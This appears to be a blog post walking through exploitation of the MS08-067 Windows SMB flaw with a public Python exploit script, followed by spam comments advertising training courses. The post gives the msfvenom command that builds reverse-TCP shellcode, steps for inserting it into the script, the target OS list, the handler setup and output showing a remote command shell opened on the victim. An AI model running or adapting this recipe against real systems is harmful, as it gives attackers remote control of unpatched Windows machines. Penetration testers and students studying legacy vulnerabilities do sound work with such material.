Exploiting MS08-067 without using metasploit.
This has been quite tricky to get working, but in summary from my experience, you cant use 'nc' as a listener for this because the payload needs to be STAGED and 'nc' will only catch STAGELESS payloads.
First download the Python Script.
Next run msfvenom with the arguments to suit your needs
msfvenom -p windows/shell/reverse_tcp LHOST=x.x.x.x LPORT=8080 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f python -v shellcode --arch x86 --platform windows
Next, replace the shell code in the python script with the shell code you have just created with msfvenom.
Note - LEAVE THE FIRST THREE LINES (NOPS) IN THE PYTHON SCRIPT.
Lines, 47, 48, 49
shellcode="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode+="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
---ENTER SHELLCODE HERE ---
Next make a note of the Operating System & Service Pack that your are trying to execute.
There are 7 options to choose from:
1 Windows XP SP0/1 Universal
2 Windows 2000 Universal
3 Windows 2003 SP0 Universal
4 Windows 2003 SP1 English
5 Windows XP SP3 French (NX)
6 Windows XP SP3 English (NX)
7 Windows XP SP3 English (AlwaysOn NX)
Next - Start Metasploit and setup a handler
use exploit/multi/handler
set LHOST X.X.X.X
set LPORT XXXX
set payload windows/shell/reverse_tcp
exploit -j
Next execute the python script using the correct number that relates to the OS and Service Pack liek so.
python 40279.py 1
You should see the reverse shell returned.
msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on X.X.X.X:8080
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to A.A.A.A
[*] Command shell session 10 opened (X.X.X.X:8080 -> A.A.A.A:1219) at 2017-02-00 15:55:22 +0000
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
For Reference this is what the traffic looks like for a successful reverse TCP connection for this particular exploit.
Awesome post presented by you..your writing style is fabulous and keep update with your blogs. Best Python Online Training || Learn Python Course
ReplyDeletepython online training
ReplyDeleteartificial intelligence training
machine learning online training
we are go to help people to crack interview by providing interview questions. Here I am giving some interview questions related sites, you can visit and prepare for interview
dbms interview questions
bootstrap interview questions
Good Post. I like your blog. Thanks for Sharing
ReplyDeletePython Training in Gurgaon
Its a wonderful post and very helpful, thanks for all this information. You are including better information.
ReplyDeletePython Training in Noida
Awesome post presented by you..your writing style is fabulous and keep update with your blogs. I am a data analyst and provides data analyst courses in delhi.
ReplyDeleteHiii...Thanks for sharing Great Information....Keep Move On...
ReplyDeleteBest Python Training in Hyderabad
Good post!Thank you so much for sharing this pretty post,it was so good to read and useful to improve my knowledge as updated one,keep blogging.
ReplyDeletePython training in Electronic City
Hiii...Thanks for sharing Great info...Nice post...Keep move on....
ReplyDeletePython Training in Hyderabad
Really nice and interesting post.
ReplyDeleteI was looking for this kind of information and enjoyed reading this one.
Keep posting. Thanks for sharing.
Web Designing Training in Chennai
Web Designing Course in Chennai
Web Designing Training in Bangalore
Web Designing Course in Bangalore
Web Designing Training in Hyderabad
Web Designing Course in Hyderabad
Web Designing Training in Coimbatore
Web Designing Training
Web Designing Online Training
This is information is better good luckpython course
ReplyDeleteThis comment has been removed by the author.
ReplyDeleteThat was excellent Blog. Thanks for sharing it with us.
ReplyDeleteAlso, check Python training in Pune